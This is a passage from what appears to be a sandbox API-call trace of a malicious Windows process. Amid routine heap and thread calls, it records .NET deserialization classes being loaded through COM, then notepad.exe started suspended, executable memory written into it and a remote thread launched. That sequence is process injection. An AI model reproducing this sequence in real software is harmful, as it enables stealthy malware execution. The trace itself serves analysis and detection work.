(HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e0aa0 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x4e0ad0 [0057.013] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x4e0b00 [0057.015] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4e0b30 [0057.016] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.016] IsCharSpaceW (wch=0x53) returned 0 [0057.016] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.016] IsCharSpaceW (wch=0x53) returned 0 [0057.016] ??2@YAPEAX_K@Z () returned 0x2f50bb0 [0057.016] GetCurrentThreadId () returned 0xf14 [0057.016] _wcsicmp (_String1="window", _String2="window") returned 0 [0057.016] GetCurrentThreadId () returned 0xf14 [0057.016] GetCurrentThreadId () returned 0xf14 [0057.017] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.017] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.017] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.017] IsCharSpaceW (wch=0x42) returned 0 [0057.017] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.017] IsCharSpaceW (wch=0x42) returned 0 [0057.017] malloc (_Size=0x208) returned 0x2f50c00 [0057.017] ??2@YAPEAX_K@Z () returned 0x2f50e10 [0057.017] GetCurrentThreadId () returned 0xf14 [0057.017] _wcsicmp (_String1="window", _String2="window") returned 0 [0057.017] GetCurrentThreadId () returned 0xf14 [0057.017] GetCurrentThreadId () returned 0xf14 [0057.017] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.017] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.018] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.018] IsCharSpaceW (wch=0x52) returned 0 [0057.018] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.018] IsCharSpaceW (wch=0x52) returned 0 [0057.018] GetCurrentThreadId () returned 0xf14 [0057.018] GetCurrentThreadId () returned 0xf14 [0057.018] _wcsicmp (_String1="window", _String2="window") returned 0 [0057.018] GetCurrentThreadId () returned 0xf14 [0057.018] GetCurrentThreadId () returned 0xf14 [0057.018] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.018] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.018] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.018] IsCharSpaceW (wch=0x62) returned 0 [0057.018] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.019] IsCharSpaceW (wch=0x62) returned 0 [0057.019] GetCurrentThreadId () returned 0xf14 [0057.019] GetCurrentThreadId () returned 0xf14 [0057.019] _wcsicmp (_String1="window", _String2="window") returned 0 [0057.019] GetCurrentThreadId () returned 0xf14 [0057.019] GetCurrentThreadId () returned 0xf14 [0057.019] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.019] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.019] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.019] IsCharSpaceW (wch=0x63) returned 0 [0057.019] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0057.019] IsCharSpaceW (wch=0x63) returned 0 [0057.021] ??2@YAPEAX_K@Z () returned 0x68a880 [0057.025] GetTickCount () returned 0x1c21405 [0057.026] GetCurrentThreadId () returned 0xf14 [0057.026] GetCurrentThreadId () returned 0xf14 [0057.026] GetCurrentThreadId () returned 0xf14 [0057.026] GetTickCount () returned 0x1c21405 [0057.032] GetTickCount () returned 0x1c21405 [0057.037] GetTickCount () returned 0x1c21405 [0057.042] GetTickCount () returned 0x1c21415 [0057.058] GetTickCount () returned 0x1c21425 [0057.083] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7feff2f0000 [0057.083] GetProcAddress (hModule=0x7feff2f0000, lpProcName="CLSIDFromProgIDEx") returned 0x7feff30a4c4 [0057.083] CLSIDFromProgIDEx (in: lpszProgID="System.Runtime.Serialization.Formatters.Binary.BinaryFormatter", lpclsid=0x30dbf0 | out: lpclsid=0x30dbf0*(Data1=0x50369004, Data2=0xdb9a, Data3=0x3a75, Data4=([0]=0xbe, [1]=0x7a, [2]=0x1d, [3]=0xe, [4]=0xf0, [5]=0x17, [6]=0xb9, [7]=0xd3))) returned 0x0 [0057.085] SysStringLen (param_1=0x0) returned 0x0 [0057.086] GetProcAddress (hModule=0x7feff2f0000, lpProcName="CoGetClassObject") returned 0x7feff322e18 [0057.086] CoGetClassObject (in: rclsid=0x30dbf0*(Data1=0x50369004, Data2=0xdb9a, Data3=0x3a75, Data4=([0]=0xbe, [1]=0x7a, [2]=0x1d, [3]=0xe, [4]=0xf0, [5]=0x17, [6]=0xb9, [7]=0xd3)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef1f0e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30dbc0 | out: ppv=0x30dbc0*=0x2eb0ab0) returned 0x0 [0062.579] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x80010106 [0064.455] CLSIDFromProgIDEx (in: lpszProgID="System.Collections.ArrayList", lpclsid=0x30dbf0 | out: lpclsid=0x30dbf0*(Data1=0x6896b49d, Data2=0x7afb, Data3=0x34dc, Data4=([0]=0x93, [1]=0x4e, [2]=0x5a, [3]=0xdd, [4]=0x38, [5]=0xee, [6]=0xee, [7]=0x39))) returned 0x0 [0064.457] SysStringLen (param_1=0x0) returned 0x0 [0064.457] CoGetClassObject (in: rclsid=0x30dbf0*(Data1=0x6896b49d, Data2=0x7afb, Data3=0x34dc, Data4=([0]=0x93, [1]=0x4e, [2]=0x5a, [3]=0xdd, [4]=0x38, [5]=0xee, [6]=0xee, [7]=0x39)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef1f0e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30dbc0 | out: ppv=0x30dbc0*=0x2eb0c30) returned 0x0 [0064.847] CLSIDFromProgIDEx (in: lpszProgID="System.Text.ASCIIEncoding", lpclsid=0x30d4a0 | out: lpclsid=0x30d4a0*(Data1=0x9e28ef95, Data2=0x9c6f, Data3=0x3a00, Data4=([0]=0xb5, [1]=0x25, [2]=0x36, [3]=0xa7, [4]=0x61, [5]=0x78, [6]=0xcc, [7]=0x9c))) returned 0x0 [0064.850] SysStringLen (param_1=0x0) returned 0x0 [0064.850] CoGetClassObject (in: rclsid=0x30d4a0*(Data1=0x9e28ef95, Data2=0x9c6f, Data3=0x3a00, Data4=([0]=0xb5, [1]=0x25, [2]=0x36, [3]=0xa7, [4]=0x61, [5]=0x78, [6]=0xcc, [7]=0x9c)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef1f0e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30d470 | out: ppv=0x30d470*=0x2eb0db0) returned 0x0 [0065.021] CLSIDFromProgIDEx (in: lpszProgID="System.Security.Cryptography.FromBase64Transform", lpclsid=0x30d4a0 | out: lpclsid=0x30d4a0*(Data1=0xc1abb475, Data2=0xf198, Data3=0x39d5, Data4=([0]=0xbf, [1]=0x8d, [2]=0x33, [3]=0xb, [4]=0xc7, [5]=0x18, [6]=0x96, [7]=0x61))) returned 0x0 [0065.023] SysStringLen (param_1=0x0) returned 0x0 [0065.023] CoGetClassObject (in: rclsid=0x30d4a0*(Data1=0xc1abb475, Data2=0xf198, Data3=0x39d5, Data4=([0]=0xbf, [1]=0x8d, [2]=0x33, [3]=0xb, [4]=0xc7, [5]=0x18, [6]=0x96, [7]=0x61)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef1f0e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30d470 | out: ppv=0x30d470*=0x2eb0df0) returned 0x0 [0065.085] CLSIDFromProgIDEx (in: lpszProgID="System.IO.MemoryStream", lpclsid=0x30d4a0 | out: lpclsid=0x30d4a0*(Data1=0xf5e692d9, Data2=0x8a87, Data3=0x349d, Data4=([0]=0x96, [1]=0x57, [2]=0xf9, [3]=0x6e, [4]=0x57, [5]=0x99, [6]=0xd2, [7]=0xf4))) returned 0x0 [0065.087] SysStringLen (param_1=0x0) returned 0x0 [0065.087] CoGetClassObject (in: rclsid=0x30d4a0*(Data1=0xf5e692d9, Data2=0x8a87, Data3=0x349d, Data4=([0]=0x96, [1]=0x57, [2]=0xf9, [3]=0x6e, [4]=0x57, [5]=0x99, [6]=0xd2, [7]=0xf4)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef1f0e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30d470 | out: ppv=0x30d470*=0x2eb0eb0) returned 0x0 [0065.179] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30c678 | out: ppsaOut=0x30c678) returned 0x0 [0065.179] SafeArrayAllocData (psa=0x2eb0ec0) returned 0x0 [0065.198] SafeArrayGetVartype (in: psa=0x2eb0ec0, pvt=0x30c6a0 | out: pvt=0x30c6a0) returned 0x0 [0065.212] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30c658 | out: ppsaOut=0x30c658) returned 0x0 [0065.212] SafeArrayAllocData (psa=0x2eca550) returned 0x0 [0065.288] SafeArrayGetVartype (in: psa=0x2eca550, pvt=0x30c6a0 | out: pvt=0x30c6a0) returned 0x0 [0066.107] SafeArrayAllocDescriptorEx (in: vt=0xc, cDims=0x1, ppsaOut=0x30ce18 | out: ppsaOut=0x30ce18) returned 0x0 [0066.107] SafeArrayAllocData (psa=0x2ecb310) returned 0x0 [0066.147] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1e00, lpName=0x0) returned 0x2c4 [0067.221] CoTaskMemAlloc (cb=0x104) returned 0x2ef8990 [0067.221] GetEnvironmentVariableW (in: lpName="ProgramW6432", lpBuffer=0x2ef8990, nSize=0x80 | out: lpBuffer="") returned 0x10 [0067.222] CoTaskMemFree (pv=0x2ef8990) [0067.222] CoTaskMemAlloc (cb=0x104) returned 0x2ef8990 [0067.222] GetEnvironmentVariableW (in: lpName="windir", lpBuffer=0x2ef8990, nSize=0x80 | out: lpBuffer="") returned 0xa [0067.222] CoTaskMemFree (pv=0x2ef8990) [0067.384] GetACP () returned 0x4e4 [0067.453] lstrlenW (lpString="䅁") returned 1 [0067.453] CoTaskMemAlloc (cb=0x21) returned 0x2ed3a60 [0067.457] CreateProcessA (in: lpApplicationName="C:\\Windows\\SysWOW64\\notepad.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x3650260*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30bf08 | out: lpCommandLine=0x0, lpProcessInformation=0x30bf08*(hProcess=0x2d0, hThread=0x2cc, dwProcessId=0xf48, dwThreadId=0xf4c)) returned 1 [0067.531] CoTaskMemFree (pv=0x2ed3a60) [0067.531] CoTaskMemFree (pv=0x0) [0067.531] CoTaskMemFree (pv=0x0) [0068.011] VirtualAllocEx (hProcess=0x2d0, lpAddress=0x0, dwSize=0x33000, flAllocationType=0x3000, flProtect=0x40) returned 0x70000 [0068.040] WriteProcessMemory (in: hProcess=0x2d0, lpBaseAddress=0x70000, lpBuffer=0x136730c0*, nSize=0x33000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x136730c0*, lpNumberOfBytesWritten=0x0) returned 1 [0068.129] CreateRemoteThread (in: hProcess=0x2d0, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x70000, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2d8 [0068.133] bsearch (_Key=0x31d814c, _Base=0x7fef1f21200, _NumOfElements=0x7, _SizeOfElements=0x10, _PtFuncCompare=0x7fef1ece1d0) returned 0x7fef1f21240 [0068.134] GetCurrentThreadId () returned 0xf14 [0068.134] _wcsicmp (_String1="window", _String2="window") returned 0 [0068.134] GetCurrentThreadId () returned 0xf14 [0068.134] GetCurrentThreadId () returned 0xf14 [0068.134] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0068.134] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0068.135] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x447070 [0068.135] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x250) returned 0x2eb5570 [0068.135] malloc (_Size=0x408) returned 0x68b300 [0068.135] ??2@YAPEAX_K@Z () returned 0x2f50e60 [0068.135] GetCurrentThreadId () returned 0xf14 [0068.136] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0068.136] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x447100 [0068.360] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa8) returned 0x4526e0 [0068.361] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x2ed3a00 [0068.361] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0068.361] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x2ec2020 [0068.361] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x2ecc310 [0068.361] GetCurrentThreadId () returned 0xf14 [0068.361] _wcsicmp (_String1="window", _String2="window") returned 0 [0068.361] GetCurrentThreadId () returned 0xf14 [0068.361] GetCurrentThreadId () returned 0xf14 [0068.361] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0068.361] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0068.361] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0070.019] PostMessageW (hWnd=0x40106, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0070.021] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ec2040 | out: hHeap=0x3f0000) returned 1 [0070.022] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ec2020 | out: hHeap=0x3f0000) returned 1 [0070.022] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ed3a00 | out: hHeap=0x3f0000) returned 1 [0070.022] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4526e0 | out: hHeap=0x3f0000) returned 1 [0070.023] GetCurrentThreadId () returned 0xf14 [0070.023] GetCurrentThreadId () returned 0xf14 [0070.023] ??3@YAXPEAX@Z () returned 0x49361a01 [0070.023] ISystemDebugEventFire:IsActive (This=0x4dbce0) returned 0x1 [0070.023] ??3@YAXPEAX@Z () returned 0x49361a01 [0070.023] free (_Block=0x68a7b0) [0070.023] GetCurrentThreadId () returned 0xf14 [0070.023] GetCurrentThreadId () returned 0xf14 [0070.023] GetCurrentThreadId () returned 0xf14 [0070.024] GetCurrentThreadId () returned 0xf14 [0070.024] GetCurrentThreadId () returned 0xf14 [0070.024] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ecc310 | out: hHeap=0x3f0000) returned 1 [0070.029] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2d50080 | out: hHeap=0x3f0000) returned 1 [0070.029] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4465c0 | out: hHeap=0x3f0000) returned 1 [0070.029] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.030] GetCurrentThreadId () returned 0xf14 [0070.030] SetEvent (hEvent=0x1a0) returned 1 [0070.031] GetCurrentThreadId () returned 0xf14 [0070.032] GetCurrentThreadId () returned 0xf14 [0070.032] GetCurrentThreadId () returned 0xf14 [0070.032] GetCurrentThreadId () returned 0xf14 [0070.033] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d60c0 | out: hHeap=0x3f0000) returned 1 [0070.034] GetSystemDefaultLCID () returned 0x409 [0070.034] GetVersionExW (in: lpVersionInformation=0x30ecb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x2000002, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30ecb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0070.034] GetKeyboardLayoutList (in: nBuff=32, lpList=0x30ebb0 | out: lpList=0x30ebb0) returned 1 [0070.034] GetSystemMetrics (nIndex=4096) returned 0 [0070.034] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0c8 [0070.034] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0ac [0070.034] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0af [0070.035] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c3 [0070.035] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c4 [0070.035] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c2 [0070.035] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc073 [0070.035] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0cc [0070.035] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x50) returned 0x44d030 [0070.036] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x4465c0 [0070.036] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x2ed3a00 [0070.036] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa8) returned 0x4526e0 [0070.036] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4e1400, Size=0x138) returned 0x2eb5d70 [0070.036] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x150) returned 0x2ef1d40 [0070.037] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.037] RedrawWindow (hWnd=0x20316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0070.038] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ed3a00 | out: hHeap=0x3f0000) returned 1 [0070.038] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4477a0, Size=0x18) returned 0x4477a0 [0070.038] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.038] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x457a70 | out: hHeap=0x3f0000) returned 1 [0070.038] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ed39d0 | out: hHeap=0x3f0000) returned 1 [0070.039] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x451500 | out: hHeap=0x3f0000) returned 1 [0070.040] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4c1d50 | out: hHeap=0x3f0000) returned 1 [0070.048] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x451660 | out: hHeap=0x3f0000) returned 1 [0070.048] IUnknown:Release (This=0x42da90) returned 0xe [0070.048] IUnknown:Release (This=0x43ead0) returned 0x3 [0070.048] IUnknown:Release (This=0x42da90) returned 0xd [0070.048] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.048] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.048] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4c9d70 | out: hHeap=0x3f0000) returned 1 [0070.049] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e308a0 | out: hHeap=0x3f0000) returned 1 [0070.049] IUnknown:Release (This=0x42da90) returned 0xc [0070.049] IUnknown:Release (This=0x43ead0) returned 0x2 [0070.049] IUnknown:Release (This=0x42da90) returned 0xb [0070.049] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.049] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.049] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45a250 | out: hHeap=0x3f0000) returned 1 [0070.049] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4590e0 | out: hHeap=0x3f0000) returned 1 [0070.049] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.049] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.049] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] IUnknown:Release (This=0x42da90) returned 0xa [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] IUnknown:Release (This=0x42da90) returned 0x9 [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] IUnknown:Release (This=0x42da90) returned 0x8 [0070.050] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.050] IUnknown:Release (This=0x458460) returned 0x1 [0070.050] IUnknown:Release (This=0x458460) returned 0x0 [0070.762] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44dc30 | out: hHeap=0x3f0000) returned 1 [0070.762] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.763] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.763] IUnknown:Release (This=0x42da90) returned 0x5 [0070.763] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x457e90 | out: hHeap=0x3f0000) returned 1 [0070.763] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x457bd0 | out: hHeap=0x3f0000) returned 1 [0070.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4576d0 | out: hHeap=0x3f0000) returned 1 [0070.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4bf820 | out: hHeap=0x3f0000) returned 1 [0070.764] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4c0840 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4515b0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44dbd0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4578b0 | out: hHeap=0x3f0000) returned 1 [0070.765] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445b10 | out: hHeap=0x3f0000) returned 1 [0070.766] GetCurrentThreadId () returned 0xf14 [0070.766] GetCurrentThreadId () returned 0xf14 [0070.766] GetCurrentThreadId () returned 0xf14 [0072.369] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x110) returned 0x2ee0140 [0072.370] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x48) returned 0x2ecc310 [0073.063] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x340) returned 0x2eca180 [0073.064] LsGetRubyLsimethods () returned 0x0 [0073.064] LsGetTatenakayokoLsimethods () returned 0x0 [0073.064] LsGetHihLsimethods () returned 0x0 [0073.064] LsGetWarichuLsimethods () returned 0x0 [0073.064] LsGetReverseLsimethods () returned 0x0 [0073.064] LsCreateContext () returned 0x0 [0073.065] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x2ed2ee0 [0073.065] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x2ed3240 [0073.065] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x2ed3260 [0073.065] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x2ed3280 [0073.066] LsSetModWidthPairs () returned 0x0 [0073.066] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x2ecc450 [0073.149] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x2ed32c0 [0073.149] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x508) returned 0x2edf100 [0073.149] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x24) returned 0x2ee45f0 [0073.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc0) returned 0x2ec40d0 [0073.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc0) returned 0x458010 [0073.428] LsSetBreaking () returned 0x0 [0073.428] LsSetDoc () returned 0x0 [0073.428] LsCreateLine () returned 0x0 [0073.428] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0073.428] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xf0) returned 0x439850 [0074.056] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xf0) returned 0x439950 [0074.056] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x118) returned 0x2ee0260 [0074.056] EnumFontsW 